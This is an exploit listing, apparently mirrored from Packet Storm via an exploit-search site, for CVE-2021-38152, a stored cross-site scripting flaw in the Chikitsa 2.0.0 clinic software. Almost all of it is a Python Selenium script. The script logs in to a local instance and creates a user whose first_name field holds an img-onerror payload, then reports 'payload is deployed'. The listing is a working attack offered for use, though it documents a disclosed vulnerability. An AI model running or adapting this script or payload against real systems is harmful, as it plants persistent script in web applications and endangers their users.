Share
## https://sploitus.com/exploit?id=PACKETSTORM:163816
# Exploit Title: XSS-Stored - Brutal PWNED on Chikitsa 2.0.0 parameter "first_name"  
# Author: nu11secur1ty  
# Testing and Debugging: nu11secur1ty $ g3ck0dr1v3r  
# Date: 08.09.2021  
# Vendor: https://chikitsa.net/  
# Link: https://sourceforge.net/projects/chikitsa/  
# CVE: CVE-2021-38152  
  
[+] Exploit Source:  
  
#!/usr/bin/python3  
# Author: @nu11secur1ty  
# CVE-2021-38152  
  
from selenium import webdriver  
import time  
  
  
#enter the link to the website you want to automate login.  
website_link="http://192.168.1.120/Chikitsa2.0.0/index.php/login/index"  
  
#enter your login username  
username="nu11secur1ty"  
  
#enter your login password  
password="password"  
  
#enter the element for username input field  
element_for_username="username"  
#enter the element for password input field  
element_for_password="password"  
#enter the element for submit button  
element_for_submit="submit"  
  
browser = webdriver.Chrome()  
browser.get((website_link))  
  
try:  
username_element = browser.find_element_by_name(element_for_username)  
username_element.send_keys(username)  
password_element = browser.find_element_by_name(element_for_password)  
password_element.send_keys(password)  
signInButton = browser.find_element_by_name(element_for_submit)  
signInButton.click()  
  
## Exploit  
time.sleep(3)  
browser.maximize_window()  
browser.get(("http://192.168.1.120/Chikitsa2.0.0/index.php/admin/add_user  
"))  
  
## buttons  
  
browser.execute_script("document.querySelector('[class=\"form-control\"]').value=\"Doctor\"")  
  
time.sleep(3)  
browser.execute_script("document.querySelector('[name=\"title\"]').value =  
'Mr'")  
  
time.sleep(1)  
browser.execute_script("document.querySelector  
('[name=\"first_name\"]').value = '</span><img src=  
https://raw.githubusercontent.com/nu11secur1ty/XSSight/master/XSS-image/image/kostaakatil.webp  
onerror=alert(1) /><span>'")  
  
time.sleep(1)  
browser.execute_script("document.querySelector('[name=\"middle_name\"]').value  
= 'Userov'")  
  
time.sleep(1)  
browser.execute_script("document.querySelector('[name=\"last_name\"]').value  
= 'Userski'")  
  
time.sleep(1)  
browser.execute_script("document.querySelector('[name=\"username\"]').value  
= 'D0ct0rA'")  
  
time.sleep(1)  
browser.execute_script("document.querySelector('[name=\"password\"]').value  
= 'password'")  
  
time.sleep(1)  
browser.execute_script("document.querySelector('[name=\"passconf\"]').value  
= 'password'")  
  
time.sleep(1)  
browser.execute_script("document.querySelector('#is_active').checked =  
true")  
  
## submit  
  
browser.execute_script("document.querySelector('[name=\"submit\"]').click()")  
  
print("payload is deployed...\n")  
  
except Exception:  
#### This exception occurs if the element are not found in the webpage.  
print("Some error occured :(")  
  
  
  
  
----------------------------------------------------------------------------------------  
  
# Reproduce:  
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-38152  
# Proof: https://streamable.com/wbo5c1  
# BR nu11secur1ty